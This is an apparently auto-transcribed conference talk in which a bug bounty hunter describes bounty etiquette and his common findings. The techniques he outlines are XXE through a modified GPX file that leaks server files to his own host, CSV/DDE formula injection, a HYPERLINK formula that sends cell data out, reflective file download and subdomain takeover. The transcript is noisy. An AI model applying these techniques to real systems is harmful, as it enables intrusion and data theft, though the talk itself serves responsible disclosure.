The Way of the Bounty

welcome all uh to the my experience as the Bounty Hunter um this is my thematics of of this talk will be around Baba Fett which for those who who know about Star Wars is according to Darth Vader the best boun you enter in the Galaxy so uh I think he never died even in the in the movie he was swallowed by some Wormhole and he spit it again and nobody nobody knows what happened to the Bounty so this will be about uh my experience in the last two years regarding this this bbap which I like to call them because it's bug bouny appreciation programs this this is something that uh Google invented this this type of word because it makes sense

it's a appreciation um it's like a something good that you are doing so um that's that's I will talk about about it so uh my name is D soers okay you already know that um I'm security consultant for check marks I'm security team leader for sh 49 um in the past 10 years of experience I disclosed more than 50 security advisories on bugre uh siunia whatever uh I made some work especially on on web application security because it's the my main focus um it's my forte if I may say it uh I was the founder of web scur I don't know with your hands if you already know web scur okay okay too many people thank you

uh and the part that makes more interesting is I love to act web applications um that's the main main main topic of my My Life um I also sometimes I participate in comments on on the media when they have any questions regarding info info security I will not talk about cyber I'm against the word cyber okay so if anyone is sitting here talking waiting for me to say cyber attacks or cyber War I will not tle um I was acknowledged by a few companies uh Microsoft which which is quite cool I was acknowledged or listed like eight times on Microsoft uh some of them with a reward uh some of these companies I I earn t-shirts swag or

bags lights um software um I don't have here any antivirus companies but I have lots of lces that I discovered uh on security issues regarding um I don't know kasperski Panda evg whatever uh the most interesting one I may tell it was eBay it was very interesting uh booking which is a bounty program that I I'm very comfortable and GoDaddy uh but also I'm very very familiar with the program so this is some of them uh on the on this talk I will talk simply about bban what is it okay I think anyone here already know that uh my experience on bpap most common vulnerabilities that I found particularly in two programs uh eer one

and in Cobalt um where to start searching both in private programs and public programs bug baly versus or not security companies and in the end if you have any questions you can ask me anything or come to me and we talk a little so what's Bug mounting quite simple right you find a bug you receive money that's it okay what what what can we talk about this just that uh which is good right when you get some good money um crowdsources programs like echer one Cobalt and bura helped the communication between the two parties the hunter if I may call it and the company itself the clients right so just to give you a small

example um I I gave the example of uber because uh Uber has a nice uh interaction with Portuguese guys because Integrity made an excellent work finding a security issue there uh I already found one issue also but Integrity okay they want lots of money so I think it's okay you find the security issue on Uber you reported on eer1 which is the platform that hosts the this program uh Uber or uh eer1 mediator or curator will tell you okay it's it's a duplicate it's a valid one um okay if it's out of scope you lose reputation something like that so in the end if everything goes well which went well to Integrity right uh e one pays

bling bling so it's quite simple experience in bug Bounty appreciation program so I started in March 2015 on Cobalt uh by luck yeah um I was in I was I found a security issue on a big IT company uh one of the biggest in the world uh I was a client and I decided okay let's try to contact him and and try to to manage the the bug itself it was a serious risk and they told me that there were a program that they were working with uh that were mediating the security issues there so it was crowd security which is now Cobalt um so I was invited to that program and started finding more issu

ues and when I got many more reputation I I I was climbing the leather and getting more invitations to the to other programs and six months later with some effort I was number one in Cobalt rank uh this is the the rank at the time um I think it changed a little bit uh I think in the current time is this I on the top but I think rupan is now number two um but and and I already have some I think more points I don't care uh this is the all of Fame which it's some type of game so you get encouraged to find more more bugs not only for the money but also for

the reputation and and also for the the okay money and reputation it's like that so um I I started to see that um it was important to to to join other programs because I was doing some well on Cobalt and we have also here a present person that is manager of the Cobalt with Jacob um and I decided to join eeran in buck buck uh I have a very bad experience at first I was getting a good invitations on for private programs and after a couple of while there one of the programs decided to create a a a um a reply to my to my one of my reports telling me that there were acceptable risk and I was like okay this

is eore I can get all your users information I act your API I can get all everything that I want from it and the guys oh but we cannot change it it's sorry it's a acceptable risk i t i Tred to mediate with buck and they helped me a lot but uh sometimes it doesn't doesn't the the the communication between the program was very bad experience for me and so I I I stopped working for buck and also it's very Hardware security and mobile apps applications so it's not my strong point so that was the start of my my losing connection with buck Ean was awesome I I had lots of invit ation from private

programs and it was pretty cool because I think in in the name of in the number of clients that must be the the the the most popular one uh I'm Number third I'm on top 30 yeah um which is on eer one I think it's good for me I I think it's I'm the first Portuguese there uh with this rank um and okay um it's not not uh this is the some of theur activity all of them were for free okay uh I want to to tell about aob especially because aob cross scripting only took two years to fix two years I I I forgot about this this bug and I was like really I found something on a

really cool O's I tried for free again just for the challenges the challenge because it was uh oil. PT and I'm a Portuguese so let's try it they offered me a t-shirt I think I think and whatever no it's important I I I I didn't uh nowadays I don't buy T-shirts anymore I I may ask on the future for trousers or or other type of clothes because it's important I don't want to give you give a talk with only a t-shirt that's weird but okay um although I did I achieve this um persistence okay I'm a very persistent guy I I don't quit easy um when I found something that I need to catch that that I I it's it needs to be

mine so uh I I always I always since I was a kid I was a selftaught guy and read a lot of books and with with that in mind uh I always try to accomplish my goals and I'm not the full-time bug Bounty owner or something I'm like like I said before I'm a security researcher and I I I was also listening to the talk of Jonathan uh which was very interesting and giving this the other the other view it's it's very cool so uh one of the things I do is searching where others usually don't search that's very important so um and at the end to prove myself that I could do it there's a challenge I

need a challenge in my life and this is one one of it some rules because you are in the bug bouncy program you have some specific rules always respect the scope they have rules okay you need to follow them if they have like only three domains or one domain and subdomains you need to only test them respect the the program itself don't be a begger uh again I will talk this in the end because because in the next slide I will show some examples on on how not to be a begger um right clean and provide such as much information uh to the program um again even Uber uh has the reference on on on Integrity blog uh

regarding the the the discoveries that they found uh that's very important and I also have to to make maor examples um one which is a friend of mine which is in in the audience who who found duplicate results on E one and they paid him anyway because the report was so good so that's very important if you go if you write a good report you might get lucky uh and also on Uber um one of I I only found one security issue on Uber uh I don't spend too much time there um I I found a out of scope issue okay usually they don't pay for out of scope but I in the report on the description I wrote

perfectly I know this is out of scope okay but this is a security risk that I think it's important to to to to publish and to tell you guys about it and you must try to fix it okay and Uber War so cool that they resolved the problem very fast and rewarded me with money so it was out of scope but still if you have a good report and have a good interaction and be respectful to the program they pay you that's that's one of the things um another tip uh read other bug bounties reports for example eer one has a full disclosure uh area where you can see lots of reports that are very good

some of them are very bad you'll see on the next slide but also you can learn a lot from from this and the book we web oneon-one is a compilation of lots of security issues on bug bug bouncy programs it's well well written is it's very cheap I think is $9.99 or something dollars so it's it's worth so don't be a beggar I think if I click it opens this is a more more money please and the guy sent him $1 okay you want more money I'll give you $1 incredible this is a beggar again we have we have M Mone examples oh sorry okay and now I can see it uh this guy was asking for

updates like daily any update any update about this one any update about this report sir that's incredible you need to be polite right the next Slide the next slide no any reason why didn't didn't close this Asam how can you close without giving any reason don't you see detail Report with image explanation he gave the image please give me give the guy money okay this is the one and this guy it's it's legendary because it's the same guy it's the same guy that that the other one so this guy sent to the mail room program and on eer one and I want 50 $50 $500 yeah but again it didn't quit hey I want more and you have when you pay this

amount I think this guy needs fast the money okay come on program give him the money fast maybe he has bills to pay can you provide more reward please please seriously I need $500 so this is out to be a begger and don't be like that if you want to test some bu Bounty program so most common vulnerabilities um I gathered some information about my valid reports uh more than 500 and I it's only based on Cobalt and Eun because they are the programs that I I I work more often so this is in Cobalt uh sorry if my charts are not so cool as by Edge but I did online I'm not very very comfortable

doing it but I want to be specific that uh reflective file download was the most popular vulnerability that I found very closely to cross-site scripting um on on the Cobalt platform uh it's incredible because it's very different from the next chart from eer one uh this was Bas in two 200 in 20 reports valid reports I don't know but it was pretty close because reflective FAL know is one of my favorite vulnerabilities is not very well known and I think uh most web more more than applications have this vulnerability on on on there so this is from Cobalt Ean completely different cross side scripting of course because it's the first thing that you tried when

you have for example a private program on eer one the first thing that you try is crossy scripting uh this is uh I can divide this this 50% on reflective on and store the the only reason is that reflected pays like sometimes 1K at Max and store can get get can get us sometimes On 5K so it's it's important to to know that type of information I found some idors injection template injection nowadays is very common uh I love Json issues API and stuff like that uh bad practice is becoming more often well they pay so um oh I'm going backwards no sorry about that click the wrong button come on okay we start searching and getting

in this case coins um on private programs of course cross side scripting because why they are most common you go to the most common vulnerabilities that you find so cross side scripting uh crosscross e or xxe is one of most interesting stuff right now uh and it's one of the things that I tried very next to the Cross scripting I always try to do the the both of them at the same time sometimes RC Rob common execution also very important uh you can find still lots of image magic vulnerabilities there so it's important check vulnerabilities in subdomains that's important also I will give you some some tools to to check uh um the the the subdomains and bad

practices I will talk about cross xxe uh cross scripting it's it's a waste of time talking here because most of you guys already know that and RC also so private programs xxe well if you get a request that Parts XML and that is allow them DTD I'm going faster because I assume that most people I understand what I'm talking about so uh it's besides so XML configure to process the info and I will show you a a real example that I found on wikil loock I don't know if uh any of you knows wikil loock uh well it's a place where you can upload or download the GPS GPX file um and go for walk or cycling or something

like that so I downloaded this the GPX file from mikil loock I modified it the GPX which is a XML so it has coordinates so uh I just tweet tweak it a little with the entity together the file issue on the Linux server and requested the the system to go to my website David soopers.com uh and grab the DTD from my server then you get request by the same name this is more Amplified so um the the the important uh the important thing to do is that when I sent this GPS GPX file I got interesting information on my server especially on my web server log it returned the version or the file hosts which was this is my my web server

okay the the IP is not this one anymore so uh returned on the request Debian okay it's the content of the adet file and it also tell me the user agent say they they are using Java so when I uploaded my modified GPX file I got interesting stuff with this we can get drop a shell control everything on the server we can do whatever and they were pretty nice they offered me a t-shirt they always offer t-shirts and uh vure uh to sides Chain Reaction I I don't know if I can say it but uh so I can buy some some stuff some cycling stuff which which I I love it because it's some of the stuff that I do is

cycling so very very cool um subdomains I have some open source tools here that I use sub Lister sub brute and the Harvester uh some of you may know it some of few Nots and they are pretty easy to use to use they are all terminal so uh you can go sublist and but the domain and they gather all the subdomains using uh reverse IP they go use Google darking and stuff like that they are very very interesting the Harvester is a tool that's even Harvest for um user accounts emails that he founds on Google darking uh LinkedIn accounts for for the guys that work on on that company so it's an awesome tool also it's very interesting

um again on private programs after you check vulnerabilities on subdomains let's check for WordPress installations because especially on Uber that's a lot of money uh you can use WP scan I think it's the best WordPress scanner tool that that nowadays uh is available to the public so uh run WP scan and try to find something interesting plugins uh or anything like that check for files and directories de Buster and your search are very very very good um one of the things that I already found and sometimes developers like to to to well to leave some files on the root server on the accessible to the public that are interesting for example uh I found already a database like SQL

back okay all the database was a backup file so PHP info is very common to find so you get the information from the PHP and uh pair disclosures and stuff like that also I had some information regarding um uh banking accounts on a file I don't know it was called one. Old dob if found and I I saw transactions there and I was like okay let let let's send to the program to see if if it pays and yeah it pays so and finally go burp it's my favorite tool my proxy tool burp so uh you can do everything even check for files using burp you can do WordPress uh scanning with burp P practices you can earn

some not not not a lot of money but some of it uh tokens validation sensitive information inside cookies yeah sometimes cookies are encoded in base 64 and as useful information I don't know why uh password strength yeah this is one thing that I I I I found lots of times in on web applications and most of it in in big companies that allow you to use the password one if if anyone allows a brute forcing attack please okay one isn't even the most common I think is 1 2 3 4 so it allows to to be to be used so uh companies need to fix that and it's also uh one of the things that are uh

eligible to to to Bounty reward uh username enumeration also using reset password or something like that and server information disclosure usually on others and again I'm going backwards public programs okay this this is the hard part because public programs are that that that are hundreds or even millions of guys trying to to act the web application where you try to also get some so what I try reflective found because it's one of my babies I love this uh and also business uh logic flaws very interesting this is not very common I'm still studying it uh and it might be one of the the future uh bouncy rewards that gain lots of of money might be business logic flaws and

I will talk about later mobile security issues of course nobody um especially me I don't understand really the mobile security issues so what I usually do is just uh try to find the end points on the application and try to get an API and gather from that because I have no knowledge on on on mobile application see V injection Exel injection also very cool and I will show an example how to do it crossy scripting bypasses because I love cross scripting and it's so so interesting to sometimes to to bypass security in the in with with these vulnerability and no no we have everything sanitized okay let me prove you or not and that's incredible also

paid member areas most bouncy Hunters don't pay for a member area so your scope is even bigger because okay the the it's in scope the member area Okay of a a client or something like that and you pay 50 bucks most bounty hunters especially from countries where uh okay I don't want to jump myself but uh don't pay that kind of money so if you pay 50 bucks you might find lots of vulnerabilities that gets you lot lot more so it's very very interesting and so uh my I don't know I I already talked with the guy who who who discovered this on on black he published on blackhead AR aif is from Israel he found reflective

Fon W um and he told me that this is incredible and it's every web application moderns is vulnerable to this type of vulnerability uh again it's present uh in every application has lots of potential uh keep in mind you find it these usually on apis uh but it's not ajacent issue so you only need some type of reflection to do it and I wrote a very good article but the address was so big so I tried to Tiny a little bit so is good RFD rocks so if you it's quite simple but in the end I will I will also tweet my my presentation if you want to download it this is a a video example that I found a

reflective file download on Google uh which got me some bucks uh and I think I need to play it okay so you have google.com I try to call back injected my call back with cul of course calculator I'm a trusty guy okay set up what from Google okay I trust it I save it on my r and when I run it something from Google you'll get what a calculator nice I can do whatever I I wanted I could uh disable uh open a new new tab with chrome uh disabling all the security uh add-ons and stuff like that I can I jack the account from the the administrator whatever I have this one from eBay uh I I created a special

crafted page was posted on web suur still in web suur um on eBay I was only listed on the the acknowledgement list so and it took like a year to fix this issue and what I did is Auto download stuff set up dobot batch file so when I open the file it opens a new window you can see it's from eBay the download so pretty trusting in my opinion so when I run it it opens a new window this could be malicious but it's not okay you can do whatever you want with this business logic flaws it's something that I told before uh it's it's something that I'm I'm trying still learning a lot because it's not very

common um any operation that the web application uh is or not coded to be performed or was not supposed to do it can be used as a teag for example uh my web application is uses two Factor authentication right okay um I think I'm secure but uh if the developer forgot the same authentication on a resette password where I can use only clicking the link and giving me access to the account I bypass the two Factor authentication so this is a major issue and you can get like two to 5K with this issue this is a business uh logic flaw it's quite simple uh I'm still learning about it and you have lots of them uh it's it's very time

consuming to learn this and you need to get in the the guts of the application to to act it and I found a great paper called breaking the web with Logics it's very interesting so you can search for it uh it's very cool uh mobile security issues um again not very familiar with mobile security issues and why in public public programs it's my it's interesting because not many people knows how to to hack uh applications on Android or iOS or something like that so it's very important on public programs to try that so this is one of the things that you can try on public programs CSV injection I love this it's so simpler so you

imagine that the web application as export or import CSV or XML okay XML no chel yes uh for example a program on Cobalt which I will not tell the name uh add the download member list where was accessible by members and admin so I change my name to equal 2 + 5 quite simple it's like doing template injection just using brackets but okay and what I when I opened the CSV after the the the exportation I noticed that my cell was the number 10 okay it did a math so interesting not bad so what I did I use DDE which a comment on I think it's open Office I think uh that tries to open CMD and run cul okay if someone

opens this Excel file we'll pop up a CK maybe yeah it open a c so this is the comment you can see it uh you can change your name to a to a CSV injection and when do me or other members have this opportunity they pop up a cul it's very interesting or it it works on on on office on Exel and uh open Office it it doesn't matter you have only to change the type of comment you can use another thing which is very interesting for example uh imagine that your password is on my last name soas you can use equal hyperlink use your link for example looper.com and you put interrogation point and give

the parameter that is on C3 when they click it they send their password okay because it's on my server and I'm waiting for that request so it's very simpler to to to to recreate and it's very very common very common nobody already because sometimes they okay I sanitize the the the equal sign you can use the plus sign the minus sign many people don't know that you you have lots of parameters that you can use so crossy scripting bypasses um I'm I'm a big fan okay of cross side scripting um and usually on public programs when you send something that you found because many companies take so long to fix it uh it gets duplicate or

it's already fixed or something like that fixed no because I already sent it but it's a kind of cliche but you need to think outside the box what I did okay let's go to Mozilla documentation and try to find something interesting like es6 the new JavaScript cool we can do anything with other type of characters like most Wes and sanitizers block single and double code okay on yes6 I use tick I bypassed it so quite simple using documentation on the new JavaScript or new technologies like angular or react you can learn a lot with new for detector is a it's incredible because you can even use uh uh I treated this uh on on October that you can use uh uh

cross scripting payload even on the function name so that's incredible you have the the information here so my my function is called this so it's quite simple um also Crossing bypasses again many developers um don't they they they try to to to use the content type HTML on Json requests which is very wrong because if it reflects something that you in injected like a name or a callback you get a popup right it's very simpler they need to create a request with ad Json or text or even protect themselves because this this even can be used as a reflective file download they need to use content disposition e to force the the name of the download they

need to sanitize and write the the the the content type on other thing than not rendered in HTML paid member areas like I told you um most of them don't pay for it uh and I already paid for many member areas which which is good because my scope is better than most people okay so uh you can increase your scope using this and really if you want to start searching on bugb programs start here and business logic flaws because I think that that's the way to go not the other ones finally I I don't know how much I have in time 15 minutes okay uh this is some Ty some some colleagues of mine I we have discussed this a lot

because especially I'm not a bug Bounty Hunter I have other profession uh but I do this like a hobby I don't get more money and with the money I earn I could buy stuff that usually I I couldn't so more shirts yeah but I need other things besides shirts my wife isn't happy with a little pack of t-shirts too okay so um one thing that I I I I try to to to explain to security companies that the the bug Bounty security companies can combine each other okay because they are totally different uh the diversity of bounty hunters uh have a a completely different approach on the penet penetration testing uh guys so um one one of the things that I I I try

to to explain most of the the the colleagues that work for security companies that it's it's it's not a perfect solution of course is gathering bug Bounty and security company I'm telling you this because one of the last uh penetration testing that I had was on a program that was present on Ean like uh a year ago no sorry it was present during a year yeah and it had uh7 70 reports solved and paid so it's very hard to to find something there because it was public many researchers tried to hack it and I can say that my penetration team uh could gather 15 I think security issues some of them pretty pretty critical so it's a

a something that you can combine each other and completely different market and I think they they companies always need to have a comp security company external internal it doesn't matter they they need to be uh specialized with those people uh and also if they have the money because the perfect solution involves money you need to have money to run this uh do a a bug bouny program establish a bug bouncy program even uh moderated by the security company and help each other on some way okay so that that's my point of view um it's it's still in the limbo this this this topic and I it's just my point of view so if you have any questions feel free

to do it or the same guy that you have on your presentation I no yeah I was re listening to to yours and I was like damn I'm next and I already use Yoda um so everyone any have any question yeah do you get push sorry do you get push back from organizations on RFD a lot sometimes yeah uh because sometimes you need to explain it a little better a little better what uh what reflective file download is um for example Google they have on their non payment rules or out of scope rules that reflective file download is not rewardable okay but I was paid for by Google with that I have friends that were paid for rfds as well yeah it

depends on business impact attack scenarios and you need to explain a little better uh what what reflect the fad is you know yeah I think it's the context problem is trying to get people to start understanding like okay well why would this be an issue yeah yeah that's the reason of a a good report and try to uh sometimes I even G gave them links to they can understand if I need to create a video I create a video uh so in a a small company reflector F download sometimes doesn't make any sense but in a big company like Google yeah they pay yeah I think it's I think it's a good example of obscure vul types

that people have a hard time understanding it makes a really good candidate for bounties yeah yeah in MO reflect the file download is uh in scope let's talk about it afterwards ah okay so any more questions you can still at the end talk to me whatever you wish if you have any question when you uh talked about the Google bug you discovered did you talk directly to the Google Google security team or did you use AER one no no Google security team yeah uh I I don't think they they on E one they have any any connect with with with Google okay in my opinion anyone no hello uh do you participate more in private or public uh programs privates

of course they they get you more money and many less researchers there so it's more more interesting you if you know what I mean uh you don't have to you don't have to like race condition against other guys so uh it's very interesting private programs but for private programs you need to have reputation and you need to climb a leather where you get more invitations and more invitation and stuff like that so and uh could you leave only with buges sorry could you just leave uh with hunting buties or it depends me in my opinion no because because you can earn in a month a lot of money but next month you can earn anything nothing zero so

it's very instable you know and in my opinion no no but I know uh there special on E one uh there are lots of guys the top 10 especially uh two or three are living the the Vidal Loca like I said because they I can tell a story that a guy uh I will not say the name because he's on camera uh just bought uh he on top three of e one he bought Lexus and he on United States I don't know why I just saw in lison Alex stand so he bought a Lexus and he paid more from transportation to the Lexus come to his City then buying the car itself on another place next door so and

especially he goes to when they they go to Defcon they are a sweet with Crystal dancers some guys are like that so I know some guys that don't like that not me I think we have another question yeah that not the vulnerability that you found has it been solved by now the vulnerability that they said that had an acceptable risk uh yeah it was fixed did you get anything for it no anything yeah and and it was one of the biggest uh newspapers online on us I can say that interesting yeah another question okay thank you um how long do you spend on each project on average and how fast on average do does it take

to how long does it take to get the first bug in a project well average it average usually if it's a private program I think you can find a bug in like first hour for example uh on average on a public program not so much uh sometimes you can spend one day two days if you find something okay and when when do you know it's time to move on to another one that's a hard question uh well uh I don't qu I don't quit easily so if I don't find anything in in those two days I try to a different approach um try some type of uh I try to study a little more about the

infrastructure web application itself and okay this is I tried crosslite scripting I tried SQL injection I tried everything okay what should I do okay let's try like I told business logic let's try something different okay so for me to quit is very hard uh I I love good challenges and your question I don't know how to answer it it's very very hard okay last question um within the private the private um programs yeah programs how do you choose which one you want to attack or do you go for them all that's very simple money okay okay thank you

simple everyone else okay so what was the the the bug that you found if you can disclose it that give you more kick or you liked it more to to research it or more challenging for you like a remote code execution on something no that that wasn't the the ones that I found are not very challenging uh like the most epic one you found yeah I'm trying to think it was so there are so many that's bad yeah yeah maybe uh sub takeover which Jonathan talked about yeah it was very very cool because it was I will not tell the company that had the vulnerability but I can tell the the company that had the the subdomain appointed to a

Salesforce account so what I did okay it doesn't open anything let's create an account on Salesforce and telling my account is for that client and I hack the the subdomain very simpler and it pays a lot yeah yeah how much do you pay for uh depends it depends yeah on the impact yeah but we we paid like thousands of dollars yeah it's it's very interesting vulnerability I'm already asking

questions sorry uh can you disclose your highest payout no sorry you did the question sorry I did no no no sorry well but you do have a lot of t-shirts yeah I could sell them someday I don't know okay thank you yeah so hope you enjoyed this this little talk thank you thank you